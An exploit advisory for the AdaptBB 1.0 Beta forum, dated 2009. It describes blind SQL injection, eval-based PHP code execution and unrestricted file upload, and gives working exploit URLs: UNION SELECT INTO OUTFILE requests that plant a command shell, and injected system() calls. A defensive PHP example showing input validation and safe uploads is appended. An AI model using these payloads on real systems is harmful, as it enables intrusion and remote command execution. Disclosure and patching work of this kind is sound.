
AdaptBB 1.0 Beta Multiple Remote Vulnerabilities




*******   Salvatore "drosophila" Fresta   *******

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/ 

[+] Bugs: [A] Multiple Blind SQL Injection
          [B] Multiple Dynamic Code Execution
          [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requirements: magic_quotes_gpc = off
[-] Files affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary SQL
queries.


- [B] Multiple Dynamic Code Execution

[-] Risk: high
[-] Files affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary PHP
code.

...

if ($_GET['box']) {
$folder = $_GET['box'];
}

...

$ddata[] = ucwords($folder);

...

eval (" ?> ".str_replace($cdata, $ddata,
stripslashes(template($view."_header")))." <?php ");

...


- [C] Arbitrary File Upload

[-] Risk: high
[-] File affected: attach.php

This bug allows a registered user to upload
arbitrary files and to execute them from the
inc/attachments directory. This is possible
because there are no controls on file extension
on the server side, only on the client side.


*************************************************

[+] Code


- [A] Multiple Blind SQL Injection

http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL 
SELECT '',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a 


- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profile&user=blabla&box= echo "
"; system('ls'); echo "
"?>

http://www.site.com/path/index.php?do=messages&user=blabla&box= echo "
"; system('ls'); echo "
"?>


*************************************************

[+] Fix

To fix them you must check the input properly.
However, it is not recommended to store your real
username and password in the cookies.


*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351
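The fix the advisory calls for ("check the input properly"), as an added example in PHP that is not AdaptBB's own code: an allowlist for `box`, template substitution without eval(), a bound integer for `id`, and a server-side extension and content check for uploads. The folder names, the attachments table and the function names are assumptions.

```php
<?php
// Added example, not AdaptBB code: hardened versions of the three
// input paths the advisory describes. Function names are hypothetical.

// [B] $_GET['box'] was concatenated into a template and eval()'d.
// Accept only a fixed set of folder names and never eval() it.
function safe_folder(?string $box): string {
    $allowed = ['inbox', 'sent', 'trash'];   // assumed folder names
    return in_array($box, $allowed, true) ? $box : 'inbox';
}

// Render the header by substitution only (no eval()); every dynamic
// value is HTML-escaped before it reaches the page.
function render_header(string $tpl, array $cdata, array $ddata): string {
    $escaped = array_map(
        fn($v) => htmlspecialchars((string)$v, ENT_QUOTES, 'UTF-8'),
        $ddata
    );
    return str_replace($cdata, $escaped, $tpl);
}

// [A] $_GET['id'] was interpolated into SQL, relying on magic_quotes_gpc.
// Reject non-numeric input and bind the value instead.
function fetch_attachment(PDO $db, string $id): ?array {
    if (!ctype_digit($id)) {
        return null;
    }
    // assumed table and column names
    $st = $db->prepare('SELECT id, name, mime FROM attachments WHERE id = ?');
    $st->bindValue(1, (int)$id, PDO::PARAM_INT);
    $st->execute();
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}
// [C] attach.php checked the extension only on the client side.
// Check it on the server, confirm the content matches, and store the
// file under a server-generated name.
function store_upload(array $file, string $dir): ?string {
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'pdf' => 'application/pdf'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($file['error'] !== UPLOAD_ERR_OK || !isset($allowed[$ext])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {   // extension and content must agree
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], "$dir/$name") ? $name : null;
}
```

Even with these checks, the web server should be configured so that nothing under inc/attachments is ever executed as PHP.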
